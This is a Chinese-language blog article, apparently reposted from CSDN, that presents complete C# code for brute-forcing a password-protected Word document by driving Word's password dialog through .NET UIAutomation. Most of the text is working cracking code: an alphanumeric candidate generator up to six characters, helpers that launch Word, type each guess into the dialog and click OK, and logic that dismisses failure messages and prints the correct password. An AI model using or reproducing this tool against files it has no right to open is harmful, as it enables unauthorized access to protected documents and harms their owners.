.NET UIAutomation簡介 UIAutomation是.Net 3.5之后提供的“界面自動化測試”技術，主要依靠通過Win32程序窗口和控件句柄獲得控制權(反射和HOOK機制)，從而達到利用程序腳本實現各類操作的目的，一般利用其實現針對Windows平臺應用程序的自動化測試。暴力破解方法 對于一個設置了密碼訪問限制的Word文檔，可以利用UIAutomation的特點，使用不斷窮舉密碼和密碼字典的方式進行破解。破解方法實現 可以窮舉字母和數字的組合作為密碼輸入數據，當然你如果愿意也可以加入特殊字符，主要實現代碼參見：using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.IO;namespace PasswordCrack {class Util{public void ReadLineAndCrack(string path, CrackHandler crack) {StreamReader reader = null;try{reader = new StreamReader(path, Encoding.Default);String line = null;while ((line = reader.ReadLine()) != null){crack(line);}}catch (IOException e){System.Console.WriteLine(e.StackTrace);}finally{if (reader != null) {reader.Close();}}}/***通過設置需要生成的第幾列字符串，生成暴力破解字符串**參數說明：*@column 第幾列*@crack 破解處理方法**/public void GenCrackWordByColumn(int column, CrackHandler crack) {string[] columns = new string[column];GenColumnsWord(columns, 0, columns.Length, crack);}/***通過設置需要生成的字符串位數范圍，生成暴力破解字符串**參數說明：*@begin 起始位*@length 從起始位開始的長度范圍*@crack 破解處理方法**/public void GenCrackWordByScope(int begin, int length, CrackHandler crack) {for (int i = begin; i < begin + length; i++){if ((begin < 1) || (length < 0)) {break;}string[] columns = new string[i];GenColumnsWord(columns, 0, columns.Length, crack);}}/***通過設置需要生成的字符串最大位數，生成暴力破解字符串**參數說明：*@bit 數組位數*@crack 破解處理方法**/public void GenCrackWord(int bit, CrackHandler crack) {for (int i = 0; i < bit; i++) {string[] columns = new string[i + 1];GenColumnsWord(columns, 0, columns.Length, crack);}}/***按列數生成暴力破解字符串，生成方式為遍歷該函數中所設定的字符組合**參數說明：*@columns 用于保存所生成字符串的數組*@index 生成第幾列數據，初始引用是需設置為0*@bit 數組位數*@crack 破解處理方法**/public void GenColumnsWord(string[] columns, int index, int bit, CrackHandler crack) {const int lowerAlpha = 'a';const int upperAlpha = 'A';const int number = '0';const int total = 10 + 26 + 26;int alpha = number;for (int i = 0; i < total; i++){if (i == 36) {alpha = upperAlpha;}if (i == 10) {alpha = lowerAlpha;}columns[index] = ((char)alpha).ToString();//迭代處理，當不是最高位時，只順序生成1個字符,是最高位時，依次順序生成所有字符if (index != (bit - 1)) {index++;GenColumnsWord(columns, index, bit, crack);index--;}StringBuilder sb = new StringBuilder();for (int j = 0; j < bit; j++) {sb.Append(columns[j]);}crack(sb.ToString());alpha++;}}} }獲取Word密碼輸入窗口句柄鏈 我們使用UIAutomationSpy獲取Word密碼輸入窗口句柄鏈：UIAutomation公共方法 在此需要實現一些公共方法，尤其是實現自動化啟動Word主程序進程以及通過進程Id號獲得主窗體句柄，主要實現代碼參見：using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Diagnostics; using System.Threading; using System.Windows.Automation;namespace PasswordCrack {class UIAutomationHelper{private string path;/***啟動進程方法***/private void StartProcess(){Process ps = Process.Start(path);}/***通過進程名稱獲取進程Id，如果該進程沒有啟動，啟動該進程后獲取其Id**參數說明：*@path 進程程序路徑*@name 進程名稱*@wait 啟動后，等待時間**/public int GetProcessId(string path, string name, int wait) {int pId = 0;int timer = 0;this.path = path;const int timeout = 60000;//啟動程序處理子線程ThreadStart ts = new ThreadStart(StartProcess);Thread thread = new Thread(ts);if (Process.GetProcessesByName(name).Length > 0) {//當進程已經存在thread.Start();if (wait > 0){Thread.Sleep(wait);}else {Thread.Sleep(500);}return Process.GetProcessesByName(name)[0].Id;}thread.Start();while (pId == 0){if (Process.GetProcessesByName(name).Length > 0){pId = Process.GetProcessesByName(name)[0].Id;}Thread.Sleep(1000);timer += 1000;if (timer > timeout) {break;}}return pId;}/***通進程Id號獲得主窗體句柄**參數說明：*@pId 進程Id**/public AutomationElement GetMainAutomationElementByPid(int pId){Process process = Process.GetProcessById(pId);AutomationElement handle = AutomationElement.FromHandle(process.MainWindowHandle);if (handle != null) {return handle;}return null;}public AutomationElement GetHandleByClassAndControlTypeFromParentHandle(AutomationElement parent, ControlType type, string className){AutomationElement handle = null;PropertyCondition classCondition = new PropertyCondition(AutomationElement.NameProperty, className);PropertyCondition typeCondition = new PropertyCondition(AutomationElement.ControlTypeProperty, type);AndCondition and = new AndCondition(classCondition, typeCondition);handle = parent.FindFirst(TreeScope.Children, and);return handle;}public AutomationElementCollection GetHandlesByControlTypeFromParentHandle(AutomationElement parent, ControlType type){AutomationElementCollection handleCollection = null;PropertyCondition typeCondition = new PropertyCondition(AutomationElement.ControlTypeProperty, type);handleCollection = parent.FindAll(TreeScope.Children, typeCondition);return handleCollection;}public AutomationElement GetWindowByClassFromParentHandle(AutomationElement parentHandle, string className){return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, ControlType.Window, className);}public AutomationElement GetButtonByClassFromParentHandle(AutomationElement parentHandle, string className){return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, ControlType.Button, className);}public AutomationElementCollection GetTextEditsFromParentHandle(AutomationElement parentHandle){return GetHandlesByControlTypeFromParentHandle(parentHandle, ControlType.Edit);}public AutomationElement GetTextEditByClassFromParentHandle(AutomationElement parentHandle, string className){return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, ControlType.Edit, className);}public AutomationElement GetTextButtonByClassFromParentHandle(AutomationElement parentHandle, string className){return GetHandleByClassAndControlTypeFromParentHandle(parentHandle, ControlType.Button, className);}/***為TextEdit設置數據**參數說明：*@textEditHandle TextEdit句柄*@strData 所設置的數據**/public bool SetTextEditData(AutomationElement textEditHandle, string strData) {ValuePattern vpTextEdit = null;if (!textEditHandle.Current.IsEnabled){throw new InvalidOperationException("The control is not enabled.\n");}if (!textEditHandle.Current.IsKeyboardFocusable){throw new InvalidOperationException("The control is not focusable.\n");}vpTextEdit = textEditHandle.GetCurrentPattern(ValuePattern.Pattern) as ValuePattern;if (null == vpTextEdit){return false;}if (vpTextEdit.Current.IsReadOnly){throw new InvalidOperationException("The control is read-only.\n");}vpTextEdit.SetValue(strData);return true;}/***左鍵單擊Button**參數說明：*@buttonHandle Button句柄**/public bool ButtonLeftClick(AutomationElement buttonHandle){object objButton = null;InvokePattern ivkpButton = null;try{if (null == buttonHandle){return false;}if (!buttonHandle.TryGetCurrentPattern(InvokePattern.Pattern, out objButton)){return false;}ivkpButton = (InvokePattern)objButton;ivkpButton.Invoke();return true;}catch (System.Exception e){throw new InvalidProgramException("Left click buttion failed", e);}}} }核心破解方法實現 利用.NET委托技術實現在窮舉字母和數字的組合過程中實現破解方法：using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; using System.Windows.Automation;namespace PasswordCrack {public delegate void CrackHandler(string word);class Crack{private const string PATH = "test.docx";private const string PROCESS_NAME = "WINWORD";public CrackHandler GetCrack() {CrackHandler @crack = Print;@crack += DoCrack;return @crack;}private void Print(string word){System.Console.WriteLine(word);}private void DoCrack(string word) {UIAutomationHelper uiah = new UIAutomationHelper();int pid = uiah.GetProcessId(PATH, PROCESS_NAME, 500);System.Console.WriteLine(pid);Thread.Sleep(1000);AutomationElement mainHandle = uiah.GetMainAutomationElementByPid(pid);AutomationElement passwd = uiah.GetWindowByClassFromParentHandle(mainHandle, "密碼");AutomationElement passwdEdit = uiah.GetTextEditsFromParentHandle(passwd)[0];uiah.SetTextEditData(passwdEdit, word);AutomationElement btn = uiah.GetButtonByClassFromParentHandle(passwd, "確定");uiah.ButtonLeftClick(btn);Thread.Sleep(1000);AutomationElement failedWindow;if ((failedWindow = uiah.GetWindowByClassFromParentHandle(mainHandle, "Microsoft Office Word")) != null){AutomationElement failedBtn = uiah.GetButtonByClassFromParentHandle(failedWindow, "確定");uiah.ButtonLeftClick(failedBtn);}else {System.Console.WriteLine(word);}}} }程序入口 using System; using System.Collections; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Threading; using System.Windows.Automation;namespace PasswordCrack {class Program{static void Main(string[] args){Util util = new Util();Crack crack = new Crack();util.GenCrackWord(6, crack.GetCrack());}} }———————————————— 版權聲明：本文為CSDN博主「xreztento」的原創文章，遵循 CC 4.0 BY-SA 版權協議，轉載請附上原文出處鏈接及本聲明。 原文鏈接：https://blog.csdn.net/xreztento/article/details/50325037

總結

以上是生活随笔為你收集整理的.NET UIAutomation实现Word文档加密暴力破解的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。